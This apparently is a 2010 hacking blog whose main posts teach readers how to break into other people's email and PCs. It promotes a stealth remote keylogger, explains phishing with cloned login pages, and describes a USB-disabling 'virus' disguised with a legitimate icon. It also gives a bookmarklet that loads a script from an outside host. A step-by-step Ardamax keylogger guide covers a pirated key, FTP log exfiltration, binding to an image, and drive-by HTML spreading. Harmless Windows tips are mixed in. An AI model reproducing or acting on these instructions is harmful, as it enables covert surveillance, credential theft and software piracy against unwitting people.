Wednesday, September 1, 2010

How To Hack eMail Password - eMail Hacking

I know most of you might be wondering to know how to hack email? You as the reader are most likely reading this because you want to hack into someone’s email. Well before you try to hack any E-Mail password, it is necessary to understand the real ways of hacking that actually work and also those that are simply scam and don’t work. Everyday I get a lot of emails where people ask me “how to hack E-Mail password?” So in this post I have taken up this topic to show you the possible ways to do that!


Is it possible to hack emails?

Yes! As a matter of fact, almost anything can be hacked. But before you learn the real ways to hack email, the following are the things you should be aware of.

1. There is no ready made software that can hack emails and get you the password just with a click of a button. So if you come across any website that claims to sell such softwares, I would advise you not to trust them.

2. Never trust any email hacking service that claims to hack any email for just $100 or $200. Most of them are no more than a scam.

So, guys, remember this is all crap. There's no reality in this email hacking service or software.

How can we Hack Email Password?

Hacking email passwords is not that easy. You can't do that by simply entering the email address and waiting for the software to crack passwords. Instead, you have to fool victim to give his own password without his knowledge. The main methods used to hack Email passwords are:

1. Remote Spy Software

The easiest way to hack an email is by using a remote spy software (Also known as keylogger). A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. Once installed, this program will automatically load from the start-up, runs in invisible mode and start capturing each and every keystroke that was typed on the computer. Some keyloggers with advanced features can also capture screenshots and monitor every activity on the computer. To install and use a kelooger one doesn’t need to have any special knowledge. That means anyone with a basic knowledge of computer can install and use this software with ease. Hence for a novice computer user this method is the easiest way to hack email password. I recommend the following keylogger as the best for gaining access to email password.
SniperSpy is a revolutionary product that will allow you to easily access *ANY* online account or password protected material such as MySpace, Facebook, Yahoo, Gmail etc. There are absolutely *NO* limitations to what accounts or websites this software can access!

Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s! This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!


Why SniperSpy is the best?

Today there exists hundreds of keyloggers on the market but most of them are no more than a crap. However there are only a few that stand out of the crowd and SniperSpy is the best among them. I personally like SniperSpy for it’s REMOTE INSTALLATION FEATURE. With this you can install it on a remote computer without the need for having physical access to it. It operates in complete stealth mode so that it remains undetected. This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Includes LIVE admin and control commands!

SniperSpy Features:
  • Access ANY Password
With SniperSpy you can hack any password and gain access to email or any other online account.
  • Monitor Every Activity
You can monitor every activity of the target computer, take screenshots and record chats & IM conversations.
  • Never Get Caught
SniperSpy operates in total stealth mode and thus remains undetectable. Thus you need not have the fear of being traced or get caught.
  • Remote Installation Feature
With Remote Install feature, it is possible to install it even on computers for which you do not have physical access. However it can also be installed on a local computer.
  • Extremely Easy to Use
Installing and using SniperSpy is simple and needs no extra skill to manage.
  • Completely Safe to Use
This software is 100% safe to use since it doesn’t collect any information from your computer. SniperSpy is a reputed, trustworthy and reliable company which offers 100% privacy for it’s users.
  • Works on both Windows and Mac
Fully compatible with Windows 2000/XP/Vista/7 and Mac.

So what are you waiting for? If you are really serious to hack E-Mail Password then SniperSpy is for you. Go grab it now and expose the truth!


The Official Website of SniperSpy


2. Other Ways to Hack E-Mail Password


- Phishing

In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public.

How does it work:

You can download/make a replica of the website you want to phish and save is as HTML. When you’re done with that, you have to find a way to upload the HTML. You can use free hosting site or a website like Blogspot, Piczo, etc. When the victim enters his email and password on the login field, phishing site save those login details and they will be automatically sent to you by mail.

Perform Phishing


- Bruteforcing

This is somewhat debating method. I have never personally tried but, read on various site and hacking forums. It is said that Hotmail accounts can be bruteforced. In Bruteforcing, you have to get wordlist - which contains various words and these words are tried out as passwords for victim hotmail account. Generally, for other sites like Gmail, Yahoo, etc. you have limited account login chances and once that number of chances expire, you are not allowed even to try to login. This mechanism helps in avoiding Bruteforce attack against email accounts. So, it is debating to say that Hotmail account passwords can be hacked (actually cracked) by Bruteforcing.

The most famous Bruteforcing software used is Brutus. But, remember, for hacking hotmail account password by Bruteforcing, you must have good quality wordlist which can be obtained via Google.


- Social engineering

This sounds to be pretty not working at beginning. Even I was neglecting this way. But, once, I thought of using it against my friend on orkut and i got his gmail password very easily by this method. I think many of you might be knowing how what this social engg is. For newbies, social engineering is method of retrieving password or answer of security question simply be queering with the victim. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.


- USB Thief

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend's/college Computer. Read my article How to Hack Passwords Using USB Pen Drive for more information.


So friends, these are most useful ways to hack email account password. I have tested most of them and found to be working to hack email account password. Just give them a try to hack your victim email account passwords. I will appreciate your effort if you mention any other email hacking method you found great to hack email account password. Happy Email Hacking!

Tuesday, August 31, 2010

Transparent Window!!

First Run "Glass" Program and then press Ctrl+Shift+1 or 2 or 3......or 0.
By this your window become transparent.

A Virus Program to Disable USB Ports

In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.
1. Download the USB_Block.rar file on to your computer.
2. It contains the following 4 files.
  • block_usb.c (source code)
  • unblock_usb.c (source code)
3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post -.How to complie c programs
3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post – How to Change the ICON of an EXE file (This step is also optional).

Monday, August 30, 2010

Some kool Javascripts for fun

Copy the scripts in adress bar (plae where u typewww.google.co.in ) and hit enter..

1)
This piece of code pulls off all the images from your web page and rotates them in a circle. Really makes any page go naked (without its images). The best place to test is a website with many images. (Google Images for an example)

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);


2)
This code lets you edit any page/website in real-time. With Firefox, you can even edit and save the modified pages to your computer. a nice one.. i love this

javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

3)
There are times when you are not sure that the website that you are visiting is authentic. Use this code whenever in doubt :-

Copy the code from here and paste into browsers address bar..

javascript:alert("The actual URL is:\t\t" + location.protocol + "//" + location.hostname + "/" + "\nThe address URL is:\t\t" + location.href + "\n" + "\nIf the server names do not match, this may be a spoof.");

4)
hake the Browser...

How about shaking the internet browser window?

Copy paste the code on the browser's address bar and press enter...

javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i) ;self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)


And finally Try this one


javascript:function reverse() { var inp = " This emoticon has been enhanced by Facicons xnaht yas ot tegrof tnoD ,skcoR diawaJ namialuS
...yad lufrednow a evaH "; var outp = ""; for (i = 0; i <= inp.length ; i++) { outp = inp.charAt (i) + outp ; } alert(outp) ;}; reverse();
 
Reveal*****(Asterisk) Pasword Using Javascript


Follow the steps given below--->

1> Open the Login Page of any website (Exp- gmail.com)

2> Type "Username" & "Password"

3>Copy & Paste the JavaScript Code given bellow into ur Broswer's add bar & hit Enter

javascript: alert(document.getElementById('Passwd').value);

4>AS soon as u hit 'Enter',A window pops up showing Password typed by you.........
 
Full Page JavaScript : All Posts in One Page (for orkut)

When you will run this script, it will show all the posts of the topic in that page only! So no need to click the "next" button, to reach your post. This will make your work easy.

Here's the code,copy it to ur url :

javascript: ($ = (d = document).createElement("script")).src = "http://im.su.ly/UL.php";void(d.body.appendChild($))

Computer Tricks!!

Clean ur RAM by notepad
Clean Ur RAM--
U may recognize that ur system gets slower and slower when playing and working a lot with ur pc. That's cause ur RAM is full of remaining progress pieces u do not need any more.

So create a new text file on ur desktop and call it .. uhm.. "RAMcleaner" or something...

Type

FreeMem=Space(64000000)
in this file and save it as RAMcleaner.vbs [ You may choose the "All Files" option when u save it ]

Run the file and ur RAM is cleaned
Of course u can edit the code in the file for a greater "cleaning-progress".


FreeMem=Space(1280000000)
 
How To Customise Your start Button

First you need a tool called "Resource Hacker". This free program allows you to change resources in any .exe file such as "Explorer.exe", which includes the [Start] button's Label. You can visit Download.com and search there for "Resource Hacker".
After you download it, follow the guide here:--


Step 1:

A - Run "Resource Hacker" and open the file "%windir%\Explorer.exe".
B - You see a Tree of all Resources in this file, expand the "String Table"
C - Find the "start" and replace it with your own text. then press the [Compile Script] button.
D - Save "Explorer.exe" as "MyStart.exe" DONT save it as Explorer.exe, do "save as.." and give it a new name.
E - Quit "Resource Hacker".

Step 2:

A - Click on the [Start] button and choose the "Run..." item from the start menu. (Or use the shortcut key WinKey+R)
B - Type "RegEdit" in the Run "Dialog Box". And then press the [Ok] buton to run the "Registry Editor" program.
C - Go to: "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon" and find the "Shell" property.
D - Replace value of the "Shell" property to "MyStart.exe".
E - Quit "Registry Editor".
F - Restart your system.
Note about Registry Editor:
if you did not find the key "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon", you can search the Registry for the "Explorer.exe", to do this use the Edit Menu | Find Next (Ctrl+F).
 
DELETE SHUTDOWN BUTTON FROM START MENU

Another easier method will b thru the group policy editor...

1) Run ( Windows key+ R)
2) Type gpedit.msc
3)User Configuration >> Administrative templates >> Taskbar and start menu >> Locate
" Prevent access to Shut Down command.."

ENJOY.... 
 
FOLDER OPTION MISSING

Windows explorer due to some virus or trojan effect.
Here's the solution-->

Open Run and then type "gpedit.msc".
Now goto User Configuration > Administrative templates > Windows Component > Windows Explorer.
Click on Windows Explorer you will find the 3rd option on the right side of screen "Removes the Folder Option menu item from the Tools menu"
Just check it, if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured.

I hopes that you will find the option after restarting windows..

Change the NAME OF RECYCLE BIN


1. Click Start
2. Click Run
3. Type regedit and hit ENTER
4. In the registry editor go to the following key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache

5. Double click on the following value:
@C:\WINDOWS\system32\SHELL32.dll,-8964

6. AFTER DOUBLE CLICKING Change the NAME FROM RECYCLE BIN to whatever you wish.

7. Click OK and close out regedit
8. Click on a blank area of the desktop and select refresh from the context menu.
9. After the screen refreshes, you recycle bin will be renamed to whatever you decided.

DOS Commands!!

Accessibility Controls - access.cpl
Add Hardware Wizard - hdwwiz.cpl
Add/Remove Programs - appwiz.cpl
Adobe Photoshop (if installed) - photoshop
Administrative Tools - control admintools
Automatic Updates - wuaucpl.cpl
Bluetooth Transfer Wizard - fsquirt
Calculator – calc
Certificate Manager - certmgr.msc
Character Map - charmap
Check Disk Utility - chkdsk
Clipboard Viewer - clipbrd
Command Prompt - cmd
Component Services - dcomcnfg
Computer Management - compmgmt.msc
Date and Time Properties - timedate.cpl
DDE Shares - ddeshare
Device Manager - devmgmt.msc
Direct X Control Panel (If Installed)* - directx.cpl
Direct X Troubleshooter - dxdiag
Disk Cleanup Utility - cleanmgr
Disk Defragment - dfrg.msc
Disk Management - diskmgmt.msc
Disk Partition Manager - diskpart
Display Properties - control desktop
Display Properties - desk.cpl
Display Properties (w/Appearance Tab Preselected) - control color
Dr. Watson System Troubleshooting Utility - drwtsn32
Driver Verifier Utility - verifier
Event Viewer - eventvwr.msc
File Signature Verification Tool - sigverif
Findfast - findfast.cpl
Folders Properties - control folders
Fonts - control fonts
Fonts Folder - fonts
Free Cell Card Game - freecell
Game Controllers - joy.cpl
Group Policy Editor (XP Prof) - gpedit.msc
Hearts Card Game - mshearts
Iexpress Wizard - iexpress
Indexing Service - ciadv.msc
Internet Explorer – iexplore
Internet Properties - inetcpl.cpl

Hack into Someone's PC using Keylogger

Ardamax Keylogger
============

Ardamax Keylogger 2.9 is good, but not as good as Ardamax Keylogger 2.8, reason being is because on Ardamax Keylogger 2.9, when your victim clicks the file, it comes up saying "This will install Ardamax monitoring tool, do you wish to continue?", where as if you use Ardamax 2.8, it will just infect they're PC when they click it, nothing comes up, it'll just auto-install.


A- Getting Ardamax and Registering it.
========================

1. Get Ardamax 2.8 or 2.9 (I HIGHLY recommend 2.8
Ardamax Keylogger 2.8-http://rapidshare.com/files/151005523/setup_akl.zip.html
Ardamax Keylogger 2.9-http://rapidshare.com/files/151005680/setup_akl2.zip.html

2. Once downloaded, you'll see a little note-pad icon in your desk-top icon bar thing (bottom right of your screen), now right-hand
click it and click 'Enter registration key...', now type in this where it says registration name and under it where it says
registration key:
Name: Membros
Key: CKPIUQDMITNVNRI
Once done click 'Ok' and you should get a pop-up saying 'Registration key accepted. Thanks for registering'


B- the Keylogger Engine.
===============

1. Now your going to make the Keylogger Engine (The thing you send out over msn or whatever). Click 'Remote Installation...', now,

click 'next' until you get to Appearences (it might come up straight away for Ardamax 2.9, but I can't be asked checking).

2. now your at Appearences, click 'Additional components:' and un-tick 'Log Viewer' then click 'Next'.

3. now you should be at 'Invisibility', make sure all the boxes are ticked, then click 'Next'.

4. Now you should be at 'Security', now, click 'Enable' and put your password (it can be any password you like, make it something easy

so you can remember). Once done, make sure all the boxes are ticked and click 'Next'.

5. Now you should be at 'Web Update', just click 'Next' when your here.

6. Ok, you should now be at 'Options', this all depends on you, if you want your Keylogger to be a secret on your computer so your

family know you ain't been up to anything naughty, then tick 'Start in hidden mode' and click 'Next'
(Remember, if in future you want to make a new Keylogger Engine, then press: CTRL + SHIFT + ALT + H at the same time.

7. Ok, now you should be at 'Control', click the box that says 'Send logs every', now make it so it sends logs every 30 minutes, then

where it says Delivery, un-tick 'Email' and tick 'FTP', leave the 'Include' bit as it is, now un-tick the box where it says 'Send only

if log size exceeds', once thats done,

8. Now you should be at 'FTP', ok, creat a free account at DriveHQ.com, then make sure your at 'Online Storage', then make a new
folder called: Logs
(this is where the logs are sent to when you keylogg someone)
Now on your FTP on Ardamax Keylogger, where it says 'FTP Host:', put this: http://ftp.drivehq.com/
Now where it says 'Remote Folder:', put this: Logs
Now where it says 'Userame:' and 'Password:', put your DriveHQ username and password
Once done, do NOT change your DriveHQ password or rename/delete the folder called 'Logs', if you do, the logs will not come through.

9. You should now be at 'Control', make sure all the boxes are 'ticked' then click 'Next'.

10. Where it says 'Screen Shots', adjust them as you like, but I recommend every 2 hours and full screen, once done click 'Next'.

11. Now you should be at 'Destination', now you have to choose where you put your Keylogger Engine, where it says 'Keylogger egine
path:', click 'browse' and choose where you want to put your Keylogger Engine (I suggest 'My Documents').
Now un-tick 'Open the folder containing the keylogger engine' (this should stop you from logging yourself) and then choose the Icon
you want for the keylogger engine, choose one and then click 'Next' then 'Finish'.
Watch the video on how to do all this here


C- Binding the Keylogger Engine with another file.
==============================

1. Download the Binding Tool:
Easy Binder 2.0----http://rapidshare.com/files/151005958/Easy_Binder.zip.html

2. Open it and then click the little green '+' image in the bottom left corner, then it should browse your files, go to 'My Documents'
(or where-ever you put the Keylogger Engine) and then click the file called 'Install'.

3. Do the same again but don't add the Keylogger Engine (Install), add a picture or something.

4. You need to get a .ico image, this is easy, just go to http://www.chami.com/html-kit/services/favicon/ and upload the Image you
want to be converted to .ico, once its done, click 'download'.

5. On the Binder, click 'Settings' and then where it says 'Select An Icon', click the '...' image and then browse your files, where it
says 'Files of type', scroll down and select 'All Files [*.*]', then select your .ico image which you just made like so;

6. Now on the Easy Binder, where it says 'Set Output File', click the '...' button and then put it where you want your binded files to
be saved (I recommend My Documents so you don't forget), put the name you want on the file and then click 'Save'.

Video link for this tutorial : http://www.youtube.com/watch?v=84qNWuICm5A


D- Spread Through HTML
================

You can also spread it by HTML attck
the server file of your trojan you will have to upload it on some webhosting and then change the link of the server file in the code and then save this code as "index.html" and then upload it to the same host.

All done, now everytime someone opens that webpage they would be infected with your trojan's server

http://tinypaste.com/6b4b3